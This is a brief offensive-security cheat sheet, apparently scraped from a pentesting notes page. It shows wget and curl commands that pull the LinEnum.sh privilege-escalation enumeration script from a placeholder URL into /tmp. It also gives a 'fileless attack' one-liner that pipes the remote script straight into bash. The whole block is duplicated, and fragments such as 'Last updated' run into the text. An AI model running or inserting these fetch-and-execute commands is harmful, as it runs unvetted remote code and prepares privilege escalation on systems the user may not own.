Wget/Curl Download/Upload
Wget:
wget https://url.com/path/LinEnum.sh -O /tmp/LinEnum.shCurl:
curl -o /tmp/LinEnum.sh https://url.com/path/LinEnum.shFileless attack cURL and piping with bash
curl https://url.com/path/LinEnum.sh | bashLast updated
Wget:
wget https://url.com/path/LinEnum.sh -O /tmp/LinEnum.shCurl:
curl -o /tmp/LinEnum.sh https://url.com/path/LinEnum.shFileless attack cURL and piping with bash
curl https://url.com/path/LinEnum.sh | bashLast updated